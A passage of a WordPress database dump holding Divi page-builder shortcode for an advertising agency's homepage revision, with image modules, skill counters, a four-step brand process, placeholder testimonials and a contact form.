src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Best-advertising-agency.png\" alt=\"Best Advertising Agency\" title_text=\"Best advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Our-approach.png\" title_text=\"Our approach\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Our approach\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-05 07:40:46','2020-08-05 07:40:46','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/05/134-revision-v1/',0,'revision','',0),(437,1,'2020-08-06 11:45:29','2020-08-06 11:45:29','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" 